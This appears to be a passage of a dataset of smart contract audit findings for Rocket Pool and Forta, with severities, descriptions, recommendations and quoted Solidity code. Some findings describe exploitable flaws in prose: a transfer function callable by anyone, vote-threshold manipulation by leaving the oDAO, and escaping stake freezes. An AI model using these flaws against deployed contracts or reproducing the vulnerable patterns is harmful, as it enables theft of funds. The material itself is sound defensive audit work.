""group.totalPerc"")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount"", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount.updated.time"", \\_contractName)), block.timestamp);\\n}\\n```\\n" +RocketDAOProtocolSettingsRewards - missing setting delimiters Acknowledged,medium,"Settings in the Rocket Pool system are hierarchical, and namespaces are prefixed using dot delimiters.\\nCalling `abi.encodePacked(, )` on strings performs a simple concatenation. According to the settings' naming scheme, it is suggested that the following example writes to a key named: `.rewards.claims.group.amount.<_contractName>`. However, due to missing delimiters, the actual key written to is: `.rewards.claimsgroup.amount<_contractName>`.\\nNote that there is no delimiter between `claims|group` and `amount|<_contractName>`.\\n```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, ""Claimers cannot total more than 100%"");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,""rewards.claims"", ""group.totalPerc"")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount"", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount.updated.time"", \\_contractName)), block.timestamp);\\n}\\n```\\n",We recommend adding the missing intermediate delimiters. The system should enforce delimiters after the last setting key before user input is concatenated to reduce the risk of accidental namespace collisions.,,"```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, ""Claimers cannot total more than 100%"");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,""rewards.claims"", ""group.totalPerc"")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount"", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount.updated.time"", \\_contractName)), block.timestamp);\\n}\\n```\\n" +Use of address instead of specific contract types Acknowledged,low,"Rather than using a low-level `address` type and then casting to the safer contract type, it's better to use the best type available by default so the compiler can eventually check for type safety and contract existence and only downcast to less secure low-level types (address) when necessary.\\n`RocketStorageInterface _rocketStorage` should be declared in the arguments, removing the need to cast the address explicitly.\\n```\\n/// @notice Sets up starting delegate contract and then delegates initialisation to it\\nfunction initialise(address \\_rocketStorage, address \\_nodeAddress) external override notSelf {\\n // Check input\\n require(\\_nodeAddress != address(0), ""Invalid node address"");\\n require(storageState == StorageState.Undefined, ""Already initialised"");\\n // Set storage state to uninitialised\\n storageState = StorageState.Uninitialised;\\n // Set rocketStorage\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n```\\n\\n`RocketMinipoolInterface _minipoolAddress` should be declared in the arguments, removing the need to cast the address explicitly. Downcast to low-level address if needed. The event can be redeclared with the contract type.\\n```\\nfunction beginReduceBondAmount(address \\_minipoolAddress, uint256 \\_newBondAmount) override external onlyLatestContract(""rocketMinipoolBondReducer"", address(this)) {\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n```\\n\\n```\\n/// @notice Returns whether owner of given minipool can reduce bond amount given the waiting period constraint\\n/// @param \\_minipoolAddress Address of the minipool\\nfunction canReduceBondAmount(address \\_minipoolAddress) override public view returns (bool) {\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n RocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(""rocketDAONodeTrustedSettingsMinipool""));\\n uint256 reduceBondTime = getUint(keccak256(abi.encodePacked(""minipool.bond.reduction.time"", \\_minipoolAddress)));\\n return rocketDAONodeTrustedSettingsMinipool.isWithinBondReductionWindow(block.timestamp.sub(reduceBondTime));\\n}\\n```\\n\\n```\\nfunction voteCancelReduction(address \\_minipoolAddress) override external onlyTrustedNode(msg.sender) onlyLatestContract(""rocketMinipoolBondReducer"", address(this)) {\\n // Prevent calling if consensus has already been reached\\n require(!getReduceBondCancelled(\\_minipoolAddress), ""Already cancelled"");\\n // Get contracts\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n```\\n\\nNote that `abi.encode*(contractType)` assumes `address` for contract types by default. An explicit downcast is not required.\\n```\\n » Test example = Test(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4)\\n » abi.encodePacked(""hi"", example)\\n0x68695b38da6a701c568545dcfcb03fcb875f56beddc4\\n » abi.encodePacked(""hi"", address(example))\\n0x68695b38da6a701c568545dcfcb03fcb875f56beddc4\\n```\\n\\nMore examples of `address _minipool` declarations:\\n```\\n/// @dev Internal logic to set a minipool's pubkey\\n/// @param \\_pubkey The pubkey to set for the calling minipool\\nfunction \\_setMinipoolPubkey(address \\_minipool, bytes calldata \\_pubkey) private {\\n // Load contracts\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(""addressSetStorage""));\\n // Initialize minipool & get properties\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipool);\\n```\\n\\n```\\nfunction getMinipoolDetails(address \\_minipoolAddress) override external view returns (MinipoolDetails memory) {\\n // Get contracts\\n RocketMinipoolInterface minipoolInterface = RocketMinipoolInterface(\\_minipoolAddress);\\n RocketMinipoolBase minipool = RocketMinipoolBase(payable(\\_minipoolAddress));\\n RocketNetworkPenaltiesInterface rocketNetworkPenalties = RocketNetworkPenaltiesInterface(getContractAddress(""rocketNetworkPenalties""));\\n```\\n\\nMore examples of `RocketStorageInterface _rocketStorage` casts:\\n```\\ncontract RocketNodeDistributor is RocketNodeDistributorStorageLayout {\\n bytes32 immutable distributorStorageKey;\\n\\n constructor(address \\_nodeAddress, address \\_rocketStorage) {\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n nodeAddress = \\_nodeAddress;\\n```\\n",We recommend using more specific types instead of `address` where possible. Downcast if necessary. This goes for parameter types as well as state variable types.,,"```\\n/// @notice Sets up starting delegate contract and then delegates initialisation to it\\nfunction initialise(address \\_rocketStorage, address \\_nodeAddress) external override notSelf {\\n // Check input\\n require(\\_nodeAddress != address(0), ""Invalid node address"");\\n require(storageState == StorageState.Undefined, ""Already initialised"");\\n // Set storage state to uninitialised\\n storageState = StorageState.Uninitialised;\\n // Set rocketStorage\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n```\\n" +Redundant double casts Acknowledged,low,"`_rocketStorageAddress` is already of contract type `RocketStorageInterface`.\\n```\\n/// @dev Set the main Rocket Storage address\\nconstructor(RocketStorageInterface \\_rocketStorageAddress) {\\n // Update the contract address\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n\\n`_tokenAddress` is already of contract type `ERC20Burnable`.\\n```\\nfunction burnToken(ERC20Burnable \\_tokenAddress, uint256 \\_amount) override external onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender), \\_tokenAddress));\\n // Update balances\\n tokenBalances[contractKey] = tokenBalances[contractKey].sub(\\_amount);\\n // Get the token ERC20 instance\\n ERC20Burnable tokenContract = ERC20Burnable(\\_tokenAddress);\\n```\\n\\n`_rocketTokenRPLFixedSupplyAddress` is already of contract type `IERC20`.\\n```\\nconstructor(RocketStorageInterface \\_rocketStorageAddress, IERC20 \\_rocketTokenRPLFixedSupplyAddress) RocketBase(\\_rocketStorageAddress) ERC20(""Rocket Pool Protocol"", ""RPL"") {\\n // Version\\n version = 1;\\n // Set the mainnet RPL fixed supply token address\\n rplFixedSupplyContract = IERC20(\\_rocketTokenRPLFixedSupplyAddress);\\n```\\n",We recommend removing the unnecessary double casts and copies of local variables.,,```\\n/// @dev Set the main Rocket Storage address\\nconstructor(RocketStorageInterface \\_rocketStorageAddress) {\\n // Update the contract address\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n +RocketMinipoolDelegate - Missing event in prepareVacancy,low,"The function `prepareVacancy` updates multiple contract state variables and should therefore emit an event.\\n```\\n/// @dev Sets the bond value and vacancy flag on this minipool\\n/// @param \\_bondAmount The bond amount selected by the node operator\\n/// @param \\_currentBalance The current balance of the validator on the beaconchain (will be checked by oDAO and scrubbed if not correct)\\nfunction prepareVacancy(uint256 \\_bondAmount, uint256 \\_currentBalance) override external onlyLatestContract(""rocketMinipoolManager"", msg.sender) onlyInitialised {\\n // Check status\\n require(status == MinipoolStatus.Initialised, ""Must be in initialised status"");\\n // Sanity check that refund balance is zero\\n require(nodeRefundBalance == 0, ""Refund balance not zero"");\\n // Check balance\\n RocketDAOProtocolSettingsMinipoolInterface rocketDAOProtocolSettingsMinipool = RocketDAOProtocolSettingsMinipoolInterface(getContractAddress(""rocketDAOProtocolSettingsMinipool""));\\n uint256 launchAmount = rocketDAOProtocolSettingsMinipool.getLaunchBalance();\\n require(\\_currentBalance >= launchAmount, ""Balance is too low"");\\n // Store bond amount\\n nodeDepositBalance = \\_bondAmount;\\n // Calculate user amount from launch amount\\n userDepositBalance = launchAmount.sub(nodeDepositBalance);\\n // Flag as vacant\\n vacant = true;\\n preMigrationBalance = \\_currentBalance;\\n // Refund the node whatever rewards they have accrued prior to becoming a RP validator\\n nodeRefundBalance = \\_currentBalance.sub(launchAmount);\\n // Set status to preLaunch\\n setStatus(MinipoolStatus.Prelaunch);\\n}\\n```\\n",Emit the missing event.,,"```\\n/// @dev Sets the bond value and vacancy flag on this minipool\\n/// @param \\_bondAmount The bond amount selected by the node operator\\n/// @param \\_currentBalance The current balance of the validator on the beaconchain (will be checked by oDAO and scrubbed if not correct)\\nfunction prepareVacancy(uint256 \\_bondAmount, uint256 \\_currentBalance) override external onlyLatestContract(""rocketMinipoolManager"", msg.sender) onlyInitialised {\\n // Check status\\n require(status == MinipoolStatus.Initialised, ""Must be in initialised status"");\\n // Sanity check that refund balance is zero\\n require(nodeRefundBalance == 0, ""Refund balance not zero"");\\n // Check balance\\n RocketDAOProtocolSettingsMinipoolInterface rocketDAOProtocolSettingsMinipool = RocketDAOProtocolSettingsMinipoolInterface(getContractAddress(""rocketDAOProtocolSettingsMinipool""));\\n uint256 launchAmount = rocketDAOProtocolSettingsMinipool.getLaunchBalance();\\n require(\\_currentBalance >= launchAmount, ""Balance is too low"");\\n // Store bond amount\\n nodeDepositBalance = \\_bondAmount;\\n // Calculate user amount from launch amount\\n userDepositBalance = launchAmount.sub(nodeDepositBalance);\\n // Flag as vacant\\n vacant = true;\\n preMigrationBalance = \\_currentBalance;\\n // Refund the node whatever rewards they have accrued prior to becoming a RP validator\\n nodeRefundBalance = \\_currentBalance.sub(launchAmount);\\n // Set status to preLaunch\\n setStatus(MinipoolStatus.Prelaunch);\\n}\\n```\\n" +RocketMinipool - Inconsistent access control modifier declaration onlyMinipoolOwner Acknowledged,low,"The access control modifier `onlyMinipoolOwner` should be renamed to `onlyMinipoolOwnerOrWithdrawalAddress` to be consistent with the actual check permitting the owner or the withdrawal address to interact with the function. This would also be consistent with other declarations in the codebase.\\nExample\\nThe `onlyMinipoolOwner` modifier in `RocketMinipoolBase` is the same as `onlyMinipoolOwnerOrWithdrawalAddress` in other modules.\\n```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, ""Only the node operator can access this method"");\\n \\_;\\n}\\n```\\n\\n```\\n// Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, ""Only the node operator can access this method"");\\n \\_;\\n}\\n```\\n\\nOther declarations:\\n```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress, ""Invalid minipool owner"");\\n \\_;\\n}\\n\\n/// @dev Only allow access from the owning node address or their withdrawal address\\nmodifier onlyMinipoolOwnerOrWithdrawalAddress(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress || \\_nodeAddress == rocketStorage.getNodeWithdrawalAddress(nodeAddress), ""Invalid minipool owner"");\\n \\_;\\n}\\n```\\n\\n```\\n// Only allow access from the owning node address\\nmodifier onlyMinipoolOwner(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress, ""Invalid minipool owner"");\\n \\_;\\n}\\n\\n// Only allow access from the owning node address or their withdrawal address\\nmodifier onlyMinipoolOwnerOrWithdrawalAddress(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress || \\_nodeAddress == rocketStorage.getNodeWithdrawalAddress(nodeAddress), ""Invalid minipool owner"");\\n \\_;\\n}\\n```\\n",Resolution\\nAcknowledged by the client. Not addressed within rocket-pool/[email protected]77d7cca\\nAgreed. This would change a lot of contracts just for a minor improvement in readbility.\\nWe recommend renaming `RocketMinipoolBase.onlyMinipoolOwner` to `RocketMinipoolBase.onlyMinipoolOwnerOrWithdrawalAddress`.,,"```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, ""Only the node operator can access this method"");\\n \\_;\\n}\\n```\\n" +RocketDAO*Settings - settingNameSpace should be immutable Acknowledged,low,"The `settingNameSpace` in the abstract contract `RocketDAONodeTrustedSettings` is only set on contract deployment. Hence, the fields should be declared immutable to make clear that the settings namespace cannot change after construction.\\n`RocketDAONodeTrustedSettings`\\n```\\n// The namespace for a particular group of settings\\nbytes32 settingNameSpace;\\n```\\n\\n```\\n// Construct\\nconstructor(RocketStorageInterface \\_rocketStorageAddress, string memory \\_settingNameSpace) RocketBase(\\_rocketStorageAddress) {\\n // Apply the setting namespace\\n settingNameSpace = keccak256(abi.encodePacked(""dao.trustednodes.setting."", \\_settingNameSpace));\\n}\\n```\\n\\n`RocketDAOProtocolSettings`\\n```\\n// The namespace for a particular group of settings\\nbytes32 settingNameSpace;\\n```\\n\\n```\\n// Construct\\nconstructor(RocketStorageInterface \\_rocketStorageAddress, string memory \\_settingNameSpace) RocketBase(\\_rocketStorageAddress) {\\n // Apply the setting namespace\\n settingNameSpace = keccak256(abi.encodePacked(""dao.protocol.setting."", \\_settingNameSpace));\\n}\\n```\\n\\n```\\nconstructor(RocketStorageInterface \\_rocketStorageAddress) RocketDAOProtocolSettings(\\_rocketStorageAddress, ""auction"") {\\n // Set version\\n version = 1;\\n```\\n",We recommend using the `immutable` annotation in Solidity (see Immutable).,,```\\n// The namespace for a particular group of settings\\nbytes32 settingNameSpace;\\n```\\n +Kicked oDAO members' votes taken into account Acknowledged,medium,"oDAO members can vote on proposals or submit external data to the system, acting as an oracle. Data submission is based on a vote by itself, and multiple oDAO members must submit the same data until a configurable threshold (51% by default) is reached for the data to be confirmed.\\nWhen a member gets kicked or leaves the oDAO after voting, their vote is still accounted for while the total number of oDAO members decreases.\\nA (group of) malicious oDAO actors may exploit this fact to artificially lower the consensus threshold by voting for a proposal and then leaving the oDAO. This will leave excess votes with the proposal while the total member count decreases.\\nFor example, let's assume there are 17 oDAO members. 9 members must vote for the proposal for it to pass (52.9%). Let's assume 8 members voted for, and the rest abstained and is against the proposal (47%, threshold not met). The proposal is unlikely to pass unless two malicious oDAO members leave the DAO, lowering the member count to 15 in an attempt to manipulate the vote, suddenly inflating vote power from 8/17 (47%; rejected) to 8/15 (53.3%; passed).\\nThe crux is that the votes of ex-oDAO members still count, while the quorum is based on the current oDAO member number.\\nHere are some examples, however, this is a general pattern used for oDAO votes in the system.\\nExample: RocketNetworkPrices\\nMembers submit votes via `submitPrices()`. If the threshold is reached, the proposal is executed. Quorum is based on the current oDAO member count, votes of ex-oDAO members are still accounted for. If a proposal is a near miss, malicious actors can force execute it by leaving the oDAO, lowering the threshold, and then calling `executeUpdatePrices()` to execute it.\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n\\n```\\nfunction executeUpdatePrices(uint256 \\_block, uint256 \\_rplPrice) override external onlyLatestContract(""rocketNetworkPrices"", address(this)) {\\n // Check settings\\n```\\n\\nRocketMinipoolBondReducer\\nThe `RocketMinipoolBondReducer` contract's `voteCancelReduction` function takes old votes of previously kicked oDAO members into account. This results in the vote being significantly higher and increases the potential for malicious actors, even after their removal, to sway the vote. Note that a canceled bond reduction cannot be undone.\\n```\\nRocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(""rocketDAONodeTrustedSettingsMinipool""));\\nuint256 quorum = rocketDAONode.getMemberCount().mul(rocketDAONodeTrustedSettingsMinipool.getCancelBondReductionQuorum()).div(calcBase);\\nbytes32 totalCancelVotesKey = keccak256(abi.encodePacked(""minipool.bond.reduction.vote.count"", \\_minipoolAddress));\\nuint256 totalCancelVotes = getUint(totalCancelVotesKey).add(1);\\nif (totalCancelVotes > quorum) {\\n```\\n\\nRocketNetworkPenalties\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodePenaltyThreshold()) {\\n setBool(executedKey, true);\\n incrementMinipoolPenaltyCount(\\_minipoolAddress);\\n}\\n```\\n\\n```\\n// Executes incrementMinipoolPenaltyCount if consensus threshold is reached\\nfunction executeUpdatePenalty(address \\_minipoolAddress, uint256 \\_block) override external onlyLatestContract(""rocketNetworkPenalties"", address(this)) {\\n // Get contracts\\n RocketDAOProtocolSettingsNetworkInterface rocketDAOProtocolSettingsNetwork = RocketDAOProtocolSettingsNetworkInterface(getContractAddress(""rocketDAOProtocolSettingsNetwork""));\\n // Get submission keys\\n```\\n",Track oDAO members' votes and remove them from the tally when the removal from the oDAO is executed.,,"```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n" +didTransferShares function has no access control modifier,high,"The staked tokens (shares) in Forta are meant to be transferable. Similarly, the rewards allocation for these shares for delegated staking is meant to be transferable as well. This allocation for the shares' owner is tracked in the `StakeAllocator`. To enable this, the Forta staking contract `FortaStaking` implements a `_beforeTokenTransfer()` function that calls `_allocator.didTransferShares()` when it is appropriate to transfer the underlying allocation.\\n```\\nfunction \\_beforeTokenTransfer(\\n address operator,\\n address from,\\n address to,\\n uint256[] memory ids,\\n uint256[] memory amounts,\\n bytes memory data\\n) internal virtual override {\\n for (uint256 i = 0; i < ids.length; i++) {\\n if (FortaStakingUtils.isActive(ids[i])) {\\n uint8 subjectType = FortaStakingUtils.subjectTypeOfShares(ids[i]);\\n if (subjectType == DELEGATOR\\_NODE\\_RUNNER\\_SUBJECT && to != address(0) && from != address(0)) {\\n \\_allocator.didTransferShares(ids[i], subjectType, from, to, amounts[i]);\\n }\\n```\\n\\nDue to this, the `StakeAllocator.didTransferShares()` has an `external` visibility so it can be called from the `FortaStaking` contract to perform transfers. However, there is no access control modifier to allow only the staking contract to call this. Therefore, anyone can call this function with whatever parameters they want.\\n```\\nfunction didTransferShares(\\n uint256 sharesId,\\n uint8 subjectType,\\n address from,\\n address to,\\n uint256 sharesAmount\\n) external {\\n \\_rewardsDistributor.didTransferShares(sharesId, subjectType, from, to, sharesAmount);\\n}\\n```\\n\\nSince the allocation isn't represented as a token standard and is tracked directly in the `StakeAllocator` and `RewardsDistributor`, it lacks many standard checks that would prevent abuse of the function. For example, this function does not have a check for allowance or `msg.sender==from`, so any user could call `didTransferShares()` with `to` being their address and `from` being any address they want `to` transfer allocation `from`, and the call would succeed.","Apply access control modifiers as appropriate for this contract, for example `onlyRole()`.",,"```\\nfunction \\_beforeTokenTransfer(\\n address operator,\\n address from,\\n address to,\\n uint256[] memory ids,\\n uint256[] memory amounts,\\n bytes memory data\\n) internal virtual override {\\n for (uint256 i = 0; i < ids.length; i++) {\\n if (FortaStakingUtils.isActive(ids[i])) {\\n uint8 subjectType = FortaStakingUtils.subjectTypeOfShares(ids[i]);\\n if (subjectType == DELEGATOR\\_NODE\\_RUNNER\\_SUBJECT && to != address(0) && from != address(0)) {\\n \\_allocator.didTransferShares(ids[i], subjectType, from, to, amounts[i]);\\n }\\n```\\n" +Incorrect reward epoch start date calculation,high,"The Forta rewards system is based on epochs. A privileged address with the role `REWARDER_ROLE` calls the `reward()` function with a parameter for a specific `epochNumber` that consequently distributes the rewards for that epoch. Additionally, as users stake and delegate their stake, accounts in the Forta system accrue weight that is based on the active stake to distribute these rewards. Since accounts can modify their stake as well as delegate or un-delegate it, the rewards weight for each account can be modified, as seen, for example, in the `didAllocate()` function. In turn, this modifies the `DelegatedAccRewards` storage struct that stores the accumulated rewards for each share id. To keep track of changes done to the accumulated rewards, epochs with checkpoints are used to manage the accumulated rate of rewards, their value at the checkpoint, and the timestamp of the checkpoint.\\nFor example, in the `didAllocate()` function the `addRate()` function is being called to modify the accumulated rewards.\\n```\\nfunction didAllocate(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeAmount,\\n uint256 sharesAmount,\\n address staker\\n) external onlyRole(ALLOCATOR\\_CONTRACT\\_ROLE) {\\n bool delegated = getSubjectTypeAgency(subjectType) == SubjectStakeAgency.DELEGATED;\\n if (delegated) {\\n uint8 delegatorType = getDelegatorSubjectType(subjectType);\\n uint256 shareId = FortaStakingUtils.subjectToActive(delegatorType, subject);\\n DelegatedAccRewards storage s = \\_rewardsAccumulators[shareId];\\n s.delegated.addRate(stakeAmount);\\n```\\n\\nThen the function flow goes into `setRate()` that checks the existing accumulated rewards storage and modifies it based on the current timestamp.\\n```\\nfunction addRate(Accumulator storage acc, uint256 rate) internal {\\n setRate(acc, latest(acc).rate + rate);\\n}\\n```\\n\\n```\\nfunction setRate(Accumulator storage acc, uint256 rate) internal {\\n EpochCheckpoint memory ckpt = EpochCheckpoint({ timestamp: SafeCast.toUint32(block.timestamp), rate: SafeCast.toUint224(rate), value: getValue(acc) });\\n uint256 length = acc.checkpoints.length;\\n if (length > 0 && isCurrentEpoch(acc.checkpoints[length - 1].timestamp)) {\\n acc.checkpoints[length - 1] = ckpt;\\n } else {\\n acc.checkpoints.push(ckpt);\\n }\\n}\\n```\\n\\nNamely, it pushes epoch checkpoints to the list of account checkpoints based on its timestamp. If the last checkpoint's timestamp is during the current epoch, then the last checkpoint is replaced with the new one altogether. If the last checkpoint's timestamp is different from the current epoch, a new checkpoint is added to the list. However, the `isCurrentEpoch()` function calls a function `getCurrentEpochTimestamp()` that incorrectly determines the start date of the current epoch. In particular, it doesn't take the offset into account when calculating how many epochs have already passed.\\n```\\nfunction getCurrentEpochTimestamp() internal view returns (uint256) {\\n return ((block.timestamp / EPOCH\\_LENGTH) \\* EPOCH\\_LENGTH) + TIMESTAMP\\_OFFSET;\\n}\\n\\nfunction isCurrentEpoch(uint256 timestamp) internal view returns (bool) {\\n uint256 currentEpochStart = getCurrentEpochTimestamp();\\n return timestamp > currentEpochStart;\\n}\\n```\\n\\nInstead of `((block.timestamp / EPOCH_LENGTH) * EPOCH_LENGTH) + TIMESTAMP_OFFSET`, it should be `(((block.timestamp - TIMESTAMP_OFFSET) / EPOCH_LENGTH) * EPOCH_LENGTH) + TIMESTAMP_OFFSET`. In fact, it should simply call the `getEpochNumber()` function that correctly provides the epoch number for any timestamp.\\n```\\nfunction getEpochNumber(uint256 timestamp) internal pure returns (uint32) {\\n return SafeCast.toUint32((timestamp - TIMESTAMP\\_OFFSET) / EPOCH\\_LENGTH);\\n}\\n```\\n\\nIn other words, the resulting function would look something like the following:\\n```\\n function getCurrentEpochTimestamp() public view returns (uint256) {\\n return (getEpochNumber(block.timestamp) * EPOCH_LENGTH) + TIMESTAMP_OFFSET;\\n }\\n```\\n\\nOtherwise, if `block.timestamp` is such that `(block.timestamp - TIMESTAMP_OFFSET) / EPOCH_LENGTH = n` and `block.timestamp` / EPOCH_LENGTH = n+1, which would happen on roughly 4 out of 7 days of the week since `EPOCH_LENGTH = 1 weeks` and `TIMESTAMP_OFFSET = 4 days`, this would cause the `getCurrentEpochTimestamp()` function to return the end timestamp of the epoch (which is in the future) instead of the start. Therefore, if a checkpoint with such a timestamp is committed to the account's accumulated rewards checkpoints list, it will always fail the below check in the epoch it got submitted, and any checkpoint committed afterwards but during the same epoch with a similar type of `block.timestamp` (i.e. satisfying the condition at the beginning of this paragraph), would be pushed to the top of the list instead of replacing the previous checkpoint.\\n```\\nif (length > 0 && isCurrentEpoch(acc.checkpoints[length - 1].timestamp)) {\\n acc.checkpoints[length - 1] = ckpt;\\n} else {\\n acc.checkpoints.push(ckpt);\\n```\\n\\nThis causes several checkpoints to be stored for the same epoch, which would cause issues in functions such as `getAtEpoch()`, that feeds into `getValueAtEpoch()` function that provides data for the rewards' share calculation. In the end, this would cause issues in the accounting for the rewards calculation resulting in incorrect distributions.\\nDuring the discussion with the Forta Foundation team, it was additionally discovered that there are edge cases around the limits of epochs. Specifically, epoch's end time and the subsequent epoch's start time are exactly the same, although it should be that it is only the start of the next epoch. Similarly, that start time isn't recognized as part of the epoch due to `>` sign instead of `>=`. In particular, the following changes need to be made:\\n```\\n function getEpochEndTimestamp(uint256 epochNumber) public pure returns (uint256) {\\n return ((epochNumber + 1) * EPOCH_LENGTH) + TIMESTAMP_OFFSET - 1; <---- so it is 23:59:59 instead of next day 00:00:00\\n }\\n\\n function isCurrentEpoch(uint256 timestamp) public view returns (bool) {\\n uint256 currentEpochStart = getCurrentEpochTimestamp();\\n return timestamp >= currentEpochStart; <--- for the first second on Monday\\n }\\n```\\n","A refactor of the epoch timestamp calculation functions is recommended to account for:\\nThe correct epoch number to calculate the start and end timestamps of epochs.\\nThe boundaries of epochs coinciding.\\nClarity in functions' intent. For example, adding a function just to calculate any epoch's start time and renaming `getCurrentEpochTimestamp()` to `getCurrentEpochStartTimestamp()`.",,"```\\nfunction didAllocate(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeAmount,\\n uint256 sharesAmount,\\n address staker\\n) external onlyRole(ALLOCATOR\\_CONTRACT\\_ROLE) {\\n bool delegated = getSubjectTypeAgency(subjectType) == SubjectStakeAgency.DELEGATED;\\n if (delegated) {\\n uint8 delegatorType = getDelegatorSubjectType(subjectType);\\n uint256 shareId = FortaStakingUtils.subjectToActive(delegatorType, subject);\\n DelegatedAccRewards storage s = \\_rewardsAccumulators[shareId];\\n s.delegated.addRate(stakeAmount);\\n```\\n" +A single unfreeze dismisses all other slashing proposal freezes,high,"In order to retaliate against malicious actors, the Forta staking system allows users to submit slashing proposals that are guarded by submitting along a deposit with a slashing reason. These proposals immediately freeze the proposal's subject's stake, blocking them from withdrawing that stake.\\nAt the same time, there can be multiple proposals submitted against the same subject, which works out with freezing - the subject remains frozen with each proposal submitted. However, once any one of the active proposals against the subject gets to the end of its lifecycle, be it `REJECTED`, `DISMISSED`, `EXECUTED`, or `REVERTED`, the subject gets unfrozen altogether. The other proposals might still be active, but the stake is no longer frozen, allowing the subject to withdraw it if they would like.\\nIn terms of impact, this allows bad actors to avoid punishment intended by the slashes and freezes. A malicious actor could, for example, submit a faulty proposal against themselves in the hopes that it will get quickly rejected or dismissed while the existing, legitimate proposals against them are still being considered. This would allow them to get unfrozen quickly and withdraw their stake. Similarly, in the event a bad staker has several proposals against them, they could withdraw right after a single slashing proposal goes through.\\n```\\nfunction dismissSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, DISMISSED);\\n \\_submitEvidence(\\_proposalId, DISMISSED, \\_evidence);\\n \\_returnDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction rejectSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, REJECTED);\\n \\_submitEvidence(\\_proposalId, REJECTED, \\_evidence);\\n 